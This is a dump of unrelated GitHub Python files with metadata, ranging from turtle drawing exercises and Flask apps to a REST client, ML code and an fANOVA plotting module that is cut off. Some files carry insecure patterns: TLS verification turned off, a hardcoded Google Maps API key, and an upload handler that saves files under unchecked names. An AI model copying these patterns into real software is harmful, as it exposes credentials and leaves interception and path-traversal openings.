+{"seq_id":"33036632209","text":"# მანდალის ფუძის ხატვა\n\nimport turtle\n\ns = turtle.getscreen()\nt = turtle.Turtle()\n\n# ეკრანის კონფიგურაცია\ns.title('ფერადი ფიგურების ხატვა')\ns.setup(960, 600)\ns.bgcolor('DarkOrchid')\n\n# მოძრავი კუს კონფიგურაცია\nt.speed(7)\nt.pencolor('DarkSlateBlue')\nt.fillcolor('lime')\n\n\n\n\n\n\n\n# =============\n# turtle.ht()\n# t.ht()\n\nturtle.exitonclick()\n","repo_name":"pm72/199-SCHOOL","sub_path":"2021-2022/7_5/I სემესტრი/010 (12.7.21)/color_figures.pyw","file_name":"color_figures.pyw","file_ext":"pyw","file_size_in_byte":495,"program_lang":"python","lang":"ka","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"42681070378","text":"from src.models.address import (\n create_first_address,\n add_address,\n get_address,\n get_user_address,\n remove_address\n)\nfrom src.models.user import get_user_by_email\nfrom src.server.database import connect_db, db, disconnect_db\n\nfrom bson.objectid import ObjectId\n\nasync def addresses_crud():\n option = input(\"Entre com a opção de CRUD: \")\n \n await connect_db()\n addresses_collection = db.addresses_collection\n users_collection = db.users_collection\n\n address = {\n \"street\": \"Rua Quarenta e Sete, Numero 3\",\n \"cep\": \"8465312\",\n \"district\": \"Mato Grosso\",\n \"city\": \"Cuiabá\",\n \"state\": \"MT\",\n \"is_delivery\": True\n }\n\n _id = ObjectId(\"6333edd7e66aa37f2fc806c8\")\n user_email = \"lu_domagalu@gmail.com\"\n\n if option == '1':\n # create address\n user = await get_user_by_email(\n users_collection,\n user_email\n )\n\n check_address = await get_user_address(\n addresses_collection,\n user\n )\n print(check_address)\n\n if check_address:\n new_address = await add_address(\n addresses_collection,\n user,\n address\n )\n\n else:\n first_address = await create_first_address(\n addresses_collection,\n user,\n address\n )\n\n elif option == '2':\n # get address by id\n address = await get_address(\n addresses_collection,\n _id\n )\n print(address)\n\n elif option == '3':\n # get address by user \n user = await get_user_by_email(\n users_collection,\n user_email\n )\n address = await get_user_address(\n addresses_collection,\n user\n )\n print(address)\n\n elif option == '4':\n # delete\n result = await remove_address(\n addresses_collection,\n _id,\n )\n print(result)\n\n await disconnect_db()\n","repo_name":"julianakemi/shopping-cart-database","sub_path":"src/controllers/address.py","file_name":"address.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"18402862815","text":"import runway\nfrom runway.data_types import array, text\n\n@runway.setup(options={ \"seed_sentences\": array(item_type=text, min_length=5) })\ndef setup(opts):\n for i in range(5):\n print(\"Sentence {} is \\\"{}\\\"\".format(i+1, opts[\"seed_sentences\"][i]))\n\nrunway.run()\n\n# curl -H \"content-type: application/json\" -d '{\"seed_sentences\": [\"the\", \"sly\", \"fox\", \"is\", \"sly\"]}' http://localhost:9000/setup","repo_name":"runwayml/model-sdk","sub_path":"examples/docs_code_snippets/data_types_array.py","file_name":"data_types_array.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":102,"dataset":"github-code","pt":"91"}
+{"seq_id":"15596808065","text":"# EXERCSIE 4 :\r\n# write a function that takes a string and return it in the reverse order.\r\n\r\n\r\ndef reverse_string(chars: str):\r\n \"\"\"Takes a string and return it in the reverse order.\"\"\"\r\n return chars[::-1]\r\n\r\n\r\nmy_str = input(\"Enter something : \")\r\n\r\noutput = reverse_string(my_str)\r\nprint(f\"Your reversed string is {output}.\")\r\n","repo_name":"UtkarshYadav360/CheckIO-Python-Practice","sub_path":"Strings and Integers/exercise 4.py","file_name":"exercise 4.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"9975321382","text":"\nimport logging\nimport requests as rq\n\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrq.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\nfrom rest.client.rest_client_base import RestClientBase\n\nlog = logging.getLogger(__name__)\n\n\nclass NetworkApi(RestClientBase):\n\n def _make_vm_network(self, network):\n\n res = {'id' : network['id'],\n 'name': network['name'],\n 'vlan': network['vlan'],\n 'connect_mode': network['connectMode'],\n 'vlan_flag': network['vlanFlag'],\n 'mtu': network['mtu']}\n\n res['customer_vlan'] = network['userVlan']\n res['tpid'] = network['tpidType']\n\n return res\n\n def _make_vm_networks(self, networks):\n return [self._make_vm_network(network) for network in networks]\n\n def get_vm_networks(self):\n headers = self._customize_header()\n if headers:\n r = rq.get(\"https://{center_ip}/hosts/{hostId}/networks?type=vmnetwork\".\n format(center_ip=self.center_ip, hostId=self._convert_node_ip_to_id()),\n headers=headers, verify=False)\n if r.status_code == rq.codes.ok:\n return self._make_vm_networks(r.json())\n else:\n log.error(\"Some errors occurred while querying vm network, the error messages is %s\" % r.text)\n return None\n else:\n return None\n","repo_name":"JackSunshine/frank_individual_repo","sub_path":"sharp/rest/client/network_api.py","file_name":"network_api.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"74293348144","text":"from flask import Flask, render_template\nfrom rdf_utils.obeu_graph import OBEUGraph\n\napp = Flask(__name__)\napp.debug = True\n\n\n@app.route('//')\ndef index(city, year):\n \"\"\"\n Shows visualizations of a *city* in a particular *year*, given that the\n corresponding dataset is loaded inside the SPARQL server\n :param city: name of the city as it appears in the dataset\n :param year: corresponding year to be used as filter\n :return: render_template() answer\n \"\"\"\n g = OBEUGraph()\n # g.add_obeu_dimension_edges(\n # city=city,\n # year=year,\n # query_file='/home/piero/Documents/fraunhofer/obeu-explorer/rdf_utils/queries/'\n # 'exploring.rq')\n g.add_obeu_observation_edges(\n city=city,\n year=year,\n query_file='/home/piero/Documents/fraunhofer/obeu-explorer/rdf_utils/'\n 'queries/all-about-observations-from-city-in-a-year.rq')\n data = {'nodes': [], 'edges': []}\n\n # add node data as needed by visjs to help us show some useful graphics\n for node_id in g.node:\n data['nodes'].append({\n 'id': node_id,\n 'label': g.node[node_id]['label'],\n 'title': 'Name: {} Amount (€): {}'\n .format(g.node[node_id]['label'], g.node[node_id]['amount']),\n 'group': g.node[node_id]['group']\n })\n\n # add special format for edges used by visjs\n # exm: [{from: 1, to: 10}, {from: 2, to: 12]\n for edge in g.edges():\n data['edges'].append({'from': edge[0], 'to': edge[1]})\n\n return render_template('layouts/city_year_graph.html', data=data)\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000)\n","repo_name":"openbudgets/microsite_rdf","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"22785924526","text":"# 날짜 : 1월 3일_01\n# 작성자 : 윤찬우\n# 프로그램 : 함수1\n\n'''\n====함수 정의====\ndef 함수명():\n 진행문장\n \n====함수 호출====\n함수명()\n\n# ex1) 학과와 이름 정보를 출력하는 함수\ndef info():\n print(\"컴퓨터공학\")\n print(\"윤찬우\")\n\ninfo()\n\n=====값을 반환하는 함수 형식=====\ndef 함수명(매개변수):\n return 결과값\n \n1) print(함수명(인수))\n2) 변수명 = 함수명(인수)\n print(변수명)\n===========================\n\n=====값을 출력하는 함수 형���=====\ndef 함수명(매개변수):\n 실행문장\n함수이름(인수)\n===========================\n\n# ex2) 5의 제곱을 출력하는 함수\ndef sq(num):\n print(num * num)\nsq(5)\n\n# ex3) 5의 제곱을 반환하는 함수\ndef sq(num):\n return num * num\nprint(sq(5))\n\n# ex4) 입력한 정수의 제곱을 출력하는 함수\ndef sq(num):\n print(num * num)\nsq(int(input(\"정수 입력 : \")))\n\n# ex5) 입력한 정수의 제곱을 반환하는 함수\ndef sq(num):\n return num * num\nsq(int(input(\"정수 입력 : \")))\n\n# ex6) 두 정수의 합을 출력하는 함수\ndef twosum(x1, x2):\n print(x1 + x2)\n\n# ex7) 정수 하나를 입력받아 1부터 입력한 정수까지의 합을 반환하는 함수\ndef retint():\n sum = 0\n ll = int(input(\"정수 입력 : \"))\n for i in range(1, ll+1):\n sum += i\n return sum\nprint(retint())\n\n# ex8) 이름과 나이를 입력 받아 출력하는 함수\ndef information():\n name = input(\"이름 : \")\n age = input(\"나이 : \")\n print(\"이름은 %s이고 나이는 %s입니다.\" %(name, age))\ninformation()\n\n# ex8) 반지름을 입력 받아 원을 그리는 함수 작성\n# (-200, 0), (0, 0), (200, 0)위치에 원을 그리는 함수\nimport turtle as t\n\nt.color(\"red\")\n\ndef radius(r):\n t.up()\n t.goto(-200, 0)\n t.down()\n t.circle(r)\n t.up()\n t.goto(200, 0)\n t.down()\n t.circle(r)\n t.up()\n t.goto(0, 0)\n t.down()\n t.circle(r)\n\nlength = int(t.textinput(\"\",\"반지름 입력 : \"))\nradius(length)\n'''\n#=================================여기서부터는 실습 예제\n# ex10) 실수 두개를 입력 받아 합을 반환하는 함수\ndef twosum(a, b):\n return a + b\nprint(twosum(float(input(\"정수 입력1 : \")), float(input(\"정수 입력1 : \"))))\n\n\n# ex11) 단을 입력 받아 해당 구구단을 출력하는 함수\ndef multi(n):\n for i in range(1, 10):\n print(\"%d X %d = %d\" %(n, i, n * i))\nmulti(int(input(\"단 입력 : \")))\n\n# ex12) 변의 길이의 입력 받아 별을 그리는 함수\n# (0, 200), (0, -200) 위치에 별을 그린다.\nimport turtle as t\n\nt.color(\"red\")\ndef star(l):\n t.up()\n t.goto(-200, 0)\n t.down()\n for i in range(5):\n t.fd(l)\n t.lt(144)\n t.up()\n t.goto(200, 0)\n t.down()\n for i in range(5):\n t.fd(l)\n t.lt(144)\nstar(int(t.textinput(\"\",\"길이 입력 : \")))\n\n# ex13) 세 정수의 곱을 출력하는 함수\ndef mux(x1, x2, x3):\n print(x1 * x2 * x3)\nmux(1, 2, 3)\n","repo_name":"ycw1879/Vacation-Python-","sub_path":"Day07/Jan_03_01.py","file_name":"Jan_03_01.py","file_ext":"py","file_size_in_byte":3054,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"39610354759","text":"from ase.calculators.emt import EMT\nfrom ase.io import read\nfrom ase.neb import NEB\nfrom ase.optimize import BFGS, MDMin\nimport matplotlib.pyplot as plt\nfrom catlearn.optimize.mlneb import MLNEB\nfrom ase.neb import NEBTools\nimport copy\nfrom catlearn.optimize.tools import plotneb\n\n\n\"\"\" \n Toy model rearrangement of Pt heptamer island on Pt(111).\n This example contains: \n 1. Optimization of the initial and final end-points of the reaction path. \n 2.A. NEB optimization using CI-NEB as implemented in ASE. \n 2.B. NEB optimization using our machine-learning surrogate model.\n 3. Comparison between the ASE NEB and our ML-NEB algorithm.\n\"\"\"\n\n# 1. Structural relaxation. ##################################################\n\n# Setup calculator:\nase_calculator = EMT()\n\n# 1.1. Structures:\n\nslab_initial = read('./initial.traj')\nslab_initial.set_calculator(copy.deepcopy(ase_calculator))\n\nslab_final = read('./final.traj')\nslab_final.set_calculator(ase_calculator)\n\n# 1.2. Optimize initial and final end-points.\n\n# Initial end-point:\nqn = BFGS(slab_initial, trajectory='initial.traj')\nqn.run(fmax=0.01)\n\n# Final end-point:\nqn = BFGS(slab_final, trajectory='final.traj')\nqn.run(fmax=0.01)\n\n# Set number of images\nn_images = 11\n\n# 2.A. NEB using ASE\n\ninitial_ase = read('initial.traj')\nfinal_ase = read('final.traj')\n\nase_calculator = copy.deepcopy(ase_calculator)\n\nimages_ase = [initial_ase]\nfor i in range(1, n_images-1):\n image = initial_ase.copy()\n image.set_calculator(copy.deepcopy(ase_calculator))\n images_ase.append(image)\n\nimages_ase.append(final_ase)\n\nneb_ase = NEB(images_ase, climb=True)\nneb_ase.interpolate(method='idpp')\n\nqn_ase = MDMin(neb_ase, trajectory='neb_ase.traj')\nqn_ase.run(fmax=0.05)\n\n# 2.B. NEB using CatLearn\n\nneb_catlearn = MLNEB(start='initial.traj', end='final.traj',\n ase_calc=copy.deepcopy(ase_calculator),\n n_images=n_images,\n interpolation='idpp', restart=False)\n\nneb_catlearn.run(fmax=0.05, trajectory='ML-NEB.traj')\n\n# 3. Summary of the results\n\n# NEB ASE:\nprint('\\nSummary of the results: \\n')\n\natoms_ase = read('neb_ase.traj', ':')\nn_eval_ase = len(atoms_ase) - 2 * (len(atoms_ase)/n_images)\n\nprint('Number of function evaluations CI-NEB implemented in ASE:', n_eval_ase)\n\n# ML-NEB:\natoms_catlearn = read('evaluated_structures.traj', ':')\nn_eval_catlearn = len(atoms_catlearn) - 2\nprint('Number of function evaluations CatLearn:', n_eval_catlearn)\n\n# Comparison:\nprint('\\nThe ML-NEB algorithm required ',\n (n_eval_ase/n_eval_catlearn),\n 'times less number of function evaluations than '\n 'the standard NEB algorithm.')\n\n# Plot ASE NEB:\nnebtools_ase = NEBTools(images_ase)\n\nSf_ase = nebtools_ase.get_fit()[2]\nEf_ase = nebtools_ase.get_fit()[3]\n\nEf_neb_ase, dE_neb_ase = nebtools_ase.get_barrier(fit=False)\nnebtools_ase.plot_band()\n\nplt.show()\n\n# Plot ML-NEB predicted path and show images along the path:\nplotneb(trajectory='ML-NEB.traj', view_path=False)\n\n","repo_name":"SUNCAT-Center/CatLearn","sub_path":"tutorials/11_NEB/03_Heptamer_Island/neb_heptamer_island.py","file_name":"neb_heptamer_island.py","file_ext":"py","file_size_in_byte":2987,"program_lang":"python","lang":"en","doc_type":"code","stars":94,"dataset":"github-code","pt":"91"}
+{"seq_id":"10052605088","text":"from Stack import *\n\ndef sort_stack(stack1):\n stack2 = Stack()\n while (stack1.isEmpty() == False):\n tmp = stack1.pop()\n count = 0\n while (stack2.isEmpty() == False):\n if (stack2.peek() > tmp):\n stack1.push(stack2.pop())\n count += 1\n else:\n stack2.push(tmp)\n break\n if stack2.isEmpty() == True:\n stack2.push(tmp)\n while (count > 0):\n stack2.push(stack1.pop())\n count -= 1\n return stack2\n\na = Stack()\na.push(8)\na.push(5)\na.push(4)\na.push(10)\na.push(7)\n\nb = sort_stack(a)\nb.printNode()\n","repo_name":"dlydb/Cracking_Interview","sub_path":"3_5.py","file_name":"3_5.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"7894673549","text":"import unittest\r\n\r\nfrom easy_config.Configer import Configer\r\nfrom easy_config.IO_Converter import IO_Converter\r\n\r\nimport argparse \r\n\r\nclass IO_ConverterTestCase(unittest.TestCase):\r\n\r\n def setUp(self):\r\n self.cfger = Configer()\r\n self.cfger.cfg_from_ini(\"./test_cfg_a.ini\")\r\n self.cfger.cfg_from_str(self._build_cfg_text())\r\n\r\n def _build_cfg_text(self):\r\n return '''\r\n # Initial config file :\r\n [Section_test_A] \r\n mrg_var_tst = fromBcfg@str\r\n\r\n [Section_test_B]\r\n fflg = False@bool # test inline comment in cfg-str\r\n tflg = True@bool\r\n # Cell cfg written by Josef-Huang..\r\n '''\r\n \r\n def test_io_convter(self):\r\n cfg_cnvter = IO_Converter()\r\n \r\n argp_cfg = cfg_cnvter.cnvt_cfg(self.cfger, 'argparse')\r\n ome_cfg = cfg_cnvter.cnvt_cfg(self.cfger, 'omegacfg')\r\n yaml_cfg = cfg_cnvter.cnvt_cfg(self.cfger, 'yaml')\r\n \r\n self.assertEqual(type(argp_cfg), argparse.Namespace)\r\n self.assertEqual(ome_cfg.Section_test_B.fflg, False)\r\n self.assertEqual(type(yaml_cfg), str)\r\n\r\nif __name__ == '__main__':\r\n tests = ['test_io_convter']\r\n suite = unittest.TestSuite(map(IO_ConverterTestCase, tests))\r\n unittest.main(verbosity=2)","repo_name":"HuangChiEn/easy_config","sub_path":"test/test_IO_Converter.py","file_name":"test_IO_Converter.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"39141148817","text":"import math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\n\nfrom pdb import set_trace as breakpoint\n\n\ndef L2SquareDist(A, B, average=True):\n # input A must be: [nB x Na x nC]\n # input B must be: [nB x Nb x nC]\n # output C will be: [nB x Na x Nb]\n assert(A.dim()==3)\n assert(B.dim()==3)\n assert(A.size(0)==B.size(0) and A.size(2)==B.size(2))\n nB = A.size(0)\n Na = A.size(1)\n Nb = B.size(1)\n nC = A.size(2)\n\n # AB = A * B = [nB x Na x nC] * [nB x nC x Nb] = [nB x Na x Nb]\n AB = torch.bmm(A, B.transpose(1,2))\n\n AA = (A * A).sum(dim=2,keepdim=True).view(nB, Na, 1) # [nB x Na x 1]\n BB = (B * B).sum(dim=2,keepdim=True).view(nB, 1, Nb) # [nB x 1 x Nb]\n # l2squaredist = A*A + B*B - 2 * A * B\n dist = AA.expand_as(AB) + BB.expand_as(AB) - 2 * AB\n if average:\n dist = dist / nC\n\n return dist\n\n\nclass PrototypicalNetwork(nn.Module):\n def __init__(self, opt):\n super(PrototypicalNetwork, self).__init__()\n scale_cls = opt['scale_cls'] if ('scale_cls' in opt) else 1.0\n self.scale_cls = nn.Parameter(\n torch.FloatTensor(1).fill_(scale_cls), requires_grad=True)\n\n def forward(self, features_test, features_train, labels_train):\n \"\"\"Recognize novel categories based on the Prototypical Nets approach.\n\n Classify the test examples (i.e., `features_test`) using the available\n training examples (i.e., `features_test` and `labels_train`) using the\n Prototypical Nets approach.\n\n Args:\n features_test: A 3D tensor with shape\n [batch_size x num_test_examples x num_channels] that represents\n the test features of each training episode in the batch.\n features_train: A 3D tensor with shape\n [batch_size x num_train_examples x num_channels] that represents\n the train features of each training episode in the batch.\n labels_train: A 3D tensor with shape\n [batch_size x num_train_examples x nKnovel] that represents\n the train labels (encoded as 1-hot vectors) of each training\n episode in the batch.\n\n Return:\n scores_cls: A 3D tensor with shape\n [batch_size x num_test_examples x nKnovel] that represents the\n classification scores of the test feature vectors for the\n nKnovel novel categories.\n \"\"\"\n assert(features_train.dim() == 3)\n assert(labels_train.dim() == 3)\n assert(features_test.dim() == 3)\n assert(features_train.size(0) == labels_train.size(0))\n assert(features_train.size(0) == features_test.size(0))\n assert(features_train.size(1) == labels_train.size(1))\n assert(features_train.size(2) == features_test.size(2))\n\n #************************* Compute Prototypes **************************\n labels_train_transposed = labels_train.transpose(1,2)\n # Batch matrix multiplication:\n # prototypes = labels_train_transposed * features_train ==>\n # [batch_size x nKnovel x num_channels] =\n # [batch_size x nKnovel x num_train_examples] * [batch_size * num_train_examples * num_channels]\n prototypes = torch.bmm(labels_train_transposed, features_train)\n # Divide with the number of examples per novel category.\n prototypes = prototypes.div(\n labels_train_transposed.sum(dim=2, keepdim=True).expand_as(prototypes)\n )\n #***********************************************************************\n scores_cls = -self.scale_cls * L2SquareDist(features_test, prototypes)\n return scores_cls\n\ndef create_model(opt):\n return 
PrototypicalNetwork(opt)\n","repo_name":"gidariss/FewShotWithoutForgetting","sub_path":"architectures/PrototypicalNetworksHead.py","file_name":"PrototypicalNetworksHead.py","file_ext":"py","file_size_in_byte":3774,"program_lang":"python","lang":"en","doc_type":"code","stars":513,"dataset":"github-code","pt":"91"}
+{"seq_id":"30138410064","text":"# 对Harris算法的改进,能够更好地检测角点\r\n\r\nimport cv2 as cv\r\nimport matplotlib.pyplot as plt\r\n\r\n# 1 读取图像\r\nimg = cv.imread('img/xl_5.jpg')\r\ngray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\r\n# 2 角点检测\r\ncorners = cv.goodFeaturesToTrack(gray, 1000, 0.01, 10)\r\n# 3 绘制角点\r\nfor i in corners:\r\n x, y = i.ravel()\r\n cv.circle(img, (x, y), 2, (0, 0, 255), -1)\r\n# 4 图像展示\r\nplt.figure(figsize=(10, 8), dpi=100)\r\nplt.imshow(img[:, :, ::-1]), plt.title('shi-tomasi')\r\nplt.xticks([]), plt.yticks([])\r\nplt.show()\r\n","repo_name":"YEANG-i/Python-OpenCV","sub_path":"img_code/img_10_Shi_Tomasi.py","file_name":"img_10_Shi_Tomasi.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"33362942654","text":"from flask import Flask, render_template\nfrom flask_googlemaps import GoogleMaps\nfrom flask_googlemaps import Map\nimport os\n\napp = Flask(__name__, template_folder=\"./templates\")\nGoogleMaps(app, key=\"AIzaSyATjzQ8WJokmp1wBcHyZhaA1fSEmdXARys\")\n\n\n\nUPLOAD_FOLDER = os.path.basename('uploads')\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n@app.route('/')\ndef hello_world():\n return render_template('index.html')\n\n@app.route('/upload', methods=['POST'])\ndef upload_file():\n file = request.files['image']\n f = os.path.join(app.config['UPLOAD_FOLDER'], file.filename)\n \n # add your custom code to check that the uploaded file is a valid image and not a malicious file (out-of-scope for this post)\n file.save(f)\n\n return render_template('index.html')\n\n\n\n@app.route(\"/map\")\ndef mapview():\n # creating a map in the view\n\n sndmap = Map(\n identifier=\"sndmap\",\n lat=37.4419,\n lng=-122.1419,\n markers=[\n {\n 'icon': 'http://maps.google.com/mapfiles/ms/icons/green-dot.png',\n 'lat': 37.4419,\n 'lng': -122.1419,\n 'infobox': \"\"\n },\n {\n 'icon': 'http://maps.google.com/mapfiles/ms/icons/blue-dot.png',\n 'lat': 37.4300,\n 'lng': -122.1400,\n 'infobox': \"Hello World from other place\"\n }\n ]\n )\n return render_template('example.html', sndmap=sndmap)\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"dheerajsuvarna/Street-Wise","sub_path":"examples/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"39723017333","text":"from ConfigSpace.hyperparameters import CategoricalHyperparameter, Constant\nimport os\nimport numpy as np\nimport warnings\nimport pickle\nimport re\nimport logging\n\nimport matplotlib.pyplot as plt\nimport itertools as it\nfrom matplotlib import cm\nfrom mpl_toolkits.mplot3d import Axes3D\n\nclass Visualizer(object):\n\n def __init__(self, fanova, cs, directory, y_label='Performance'):\n \"\"\"\n Parameters\n ------------\n fanova: fANOVA object\n\n cs : ConfigSpace instantiation\n\n directory: str\n Path to the directory in which all plots will be stored\n \"\"\"\n self.fanova = fanova\n self.cs = cs\n self.cs_params = cs.get_hyperparameters()\n assert os.path.exists(directory), \"directory %s doesn't exist\" % directory\n self.directory = directory\n self._y_label = y_label\n self.logger = logging.getLogger(self.__module__ + '.' + self.__class__.__name__)\n\n def create_all_plots(self, three_d=True, **kwargs):\n \"\"\"\n Creates plots for all main effects and stores them into a directory\n Specifically, all single and pairwise marginals are plotted\n\n Parameters\n ----------\n three_d: boolean\n whether or not to plot pairwise marginals in 3D-plot\n \"\"\"\n # single marginals\n for param_idx in range(len(self.cs_params)):\n param_name = self.cs_params[param_idx].name\n plt.close()\n outfile_name = os.path.join(self.directory, param_name.replace(os.sep, \"_\") + \".png\")\n self.logger.info(\"creating %s\" % outfile_name)\n\n self.plot_marginal(param, show=False, **kwargs)\n plt.savefig(outfile_name)\n\n # additional pairwise plots:\n dimensions = list(range(len(self.cs_params)))\n combis = list(it.combinations(dimensions, 2))\n for combi in combis:\n param_names = [self.cs_params[p].name for p in combi]\n plt.close()\n param_names = str(param_names)\n param_names = re.sub('[!,@#\\'\\n$\\[\\]]', '', param_names)\n outfile_name = os.path.join(self.directory, str(param_names).replace(\" \", \"_\") + \".png\")\n self.logger.info(\"creating %s\" % outfile_name)\n self.plot_pairwise_marginal(combi, three_d=three_d, **kwargs)\n plt.savefig(outfile_name)\n\n def generate_pairwise_marginal(self, param_indices, resolution=20):\n \"\"\"\n Creates a plot of pairwise marginal of a selected parameters\n\n Parameters\n ------------\n param_list: list of ints or strings\n Contains the selected parameters\n\n resolution: int\n Number of samples to generate from the parameter range as\n values to predict\n \"\"\"\n assert len(param_indices) == 2, \"You have to specify 2 (different) parameters\"\n grid_list, param_names = [], []\n if (isinstance(self.cs_params[param_indices[0]], (CategoricalHyperparameter)) or\n isinstance(self.cs_params[param_indices[1]], (CategoricalHyperparameter))):\n choice_arr = []\n param_names = []\n choice_vals = []\n for p in param_indices:\n if isinstance(self.cs_params[p], (CategoricalHyperparameter)):\n choice_arr.append(self.cs_params[p].choices)\n choice_vals.append(np.arange(len(self.cs_params[p].choices)))\n else:\n lower_bound = self.cs_params[p].lower\n upper_bound = self.cs_params[p].upper\n grid = np.linspace(lower_bound, upper_bound, resolution)\n choice_arr.append(grid)\n choice_vals.append(grid)\n\n param_names.append(self.cs_params[p].name)\n\n choice_arr = [[choice_arr[1], choice_arr[0]] if len(choice_arr[1]) > len(choice_arr[0]) else [choice_arr[0], choice_arr[1]]]\n choice_vals = [[choice_vals[1], choice_vals[0]] if len(choice_vals[1]) < len(choice_vals[0]) else [choice_vals[0], choice_vals[1]]]\n choice_arr = 
np.asarray(choice_arr).squeeze()\n choice_vals = np.asarray(choice_vals).squeeze()\n param_indices = [[param_indices[1], param_indices[0]] if len(choice_vals[1]) < len(choice_vals[0]) else [param_indices[0], param_indices[1]]]\n choice_arr = np.asarray(choice_arr).squeeze()\n choice_vals = np.asarray(choice_vals).squeeze()\n param_indices = np.asarray(param_indices).squeeze()\n zz = np.zeros((len(choice_vals[0]), len(choice_vals[1])))\n\n for i, x_value in enumerate(choice_vals[0]):\n for j, y_value in enumerate(choice_vals[1]):\n zz[i][j] = self.fanova.marginal_mean_variance_for_values(param_indices, [x_value, y_value])[0]\n\n return choice_arr, zz\n\n else:\n\n for p in param_indices:\n lower_bound = self.cs_params[p].lower\n upper_bound = self.cs_params[p].upper\n param_names.append(self.cs_params[p].name)\n grid = np.linspace(lower_bound, upper_bound, resolution)\n grid_list.append(grid)\n\n zz = np.zeros([resolution * resolution])\n for i, y_value in enumerate(grid_list[1]):\n for j, x_value in enumerate(grid_list[0]):\n zz[i * resolution + j] = self.fanova.marginal_mean_variance_for_values(param_indices, [x_value, y_value])[0]\n\n zz = np.reshape(zz, [resolution, resolution])\n\n return grid_list, zz\n\n def plot_pairwise_marginal(self, param_list, resolution=20, show=False, three_d=True, colormap=cm.jet,\n add_colorbar=True):\n \"\"\"\n Creates a plot of pairwise marginal of a selected parameters\n\n Parameters\n ------------\n param_list: list of ints or strings\n Contains the selected parameters\n\n resolution: int\n Number of samples to generate from the parameter range as\n values to predict\n\n show: boolean\n whether to call plt.show() to show plot directly as interactive matplotlib-plot\n\n three_d: boolean\n whether or not to plot pairwise marginals in 3D-plot\n\n colormap: matplotlib.Colormap\n which colormap to use for the 3D plots\n\n add_colorbar: bool\n whether to add the colorbar for 3d plots\n \"\"\"\n assert len(param_list) == 2, \"You have to specify 2 (different) parameters\"\n param_names, param_indices= [], []\n\n for p_idx in param_list:\n if type(p_idx) == str: # if param_list consists of parameter names\n p_idx = self.cs.get_idx_by_hyperparameter_name(p_idx)\n param_names.append(self.cs_params[p_idx].name)\n param_indices.append(p_idx)\n\n first_is_cat = isinstance(self.cs_params[param_indices[0]], CategoricalHyperparameter)\n second_is_cat = isinstance(self.cs_params[param_indices[1]], CategoricalHyperparameter)\n\n fig = plt.figure()\n plt.title('%s and %s' % (param_names[0], param_names[1]))\n\n if first_is_cat or second_is_cat:\n # At least one of the two parameters is categorical\n choices, zz = self.generate_pairwise_marginal(param_indices, resolution)\n if first_is_cat and second_is_cat:\n # Both parameters are categorical -> create hotmap\n plt.imshow(zz, cmap='hot', interpolation='nearest')\n plt.xticks(np.arange(0, len(choices[0])), choices[0], fontsize=8)\n plt.yticks(np.arange(0, len(choices[1])), choices[1], fontsize=8)\n plt.xlabel(param_names[0])\n plt.ylabel(param_names[1])\n plt.colorbar().set_label(self._y_label)\n else:\n # Only one of them is categorical -> create multi-line-plot\n cat_choices = self.cs_params[param_indices[0]].choices if first_is_cat else self.cs_params[param_indices[1]].choices\n\n for i, cat in enumerate(cat_choices):\n plt.plot(zz[i], label='%s' % str(cat))\n\n plt.ylabel(self._y_label)\n plt.xlabel(param_names[0] if second_is_cat else param_names[1]) # x-axis displays non-categorical\n plt.legend()\n 
plt.tight_layout()\n\n else:\n # No categoricals -> create 3D-plot\n grid_list, zz = self.generate_pairwise_marginal(param_indices, resolution)\n\n z_min, z_max = zz.min(), zz.max()\n display_xx, display_yy = np.meshgrid(grid_list[0], grid_list[1])\n\n if three_d:\n ax = Axes3D(fig)\n surface = ax.plot_surface(display_xx, display_yy, zz,\n rstride=1, cstride=1, cmap=colormap, linewidth=0, antialiased=False)\n ax.set_xlabel(param_names[0])\n ax.set_ylabel(param_names[1])\n ax.set_zlabel(self._y_label)\n if add_colorbar:\n fig.colorbar(surface, shrink=0.5, aspect=5)\n\n else:\n plt.pcolor(display_xx, display_yy, zz, cmap=colormap, vmin=z_min, vmax=z_max)\n plt.xlabel(param_names[0])\n\n if self.cs_params[param_indices[0]].log:\n plt.xscale('log')\n if self.cs_params[param_indices[1]].log:\n plt.yscale('log')\n\n plt.ylabel(param_names[1])\n plt.colorbar()\n\n if show:\n plt.show()\n else:\n interact_dir = os.path.join(self.directory, 'interactive_plots')\n if not os.path.exists(interact_dir):\n self.logger.info('creating %s' % interact_dir)\n os.makedirs(interact_dir)\n try:\n pickle.dump(fig, open(interact_dir + '/%s_%s.fig.pkl' % (param_names[0], param_names[1]), 'wb'))\n except AttributeError as err:\n self.logger.debug(err, exc_info=1)\n self.logger.info(\"Pickling the interactive pairwise-marginal plot (%s) raised an exception. Resume \"\n \"without pickling. \", str(param_names))\n\n return plt\n\n def generate_marginal(self, param, resolution=100):\n 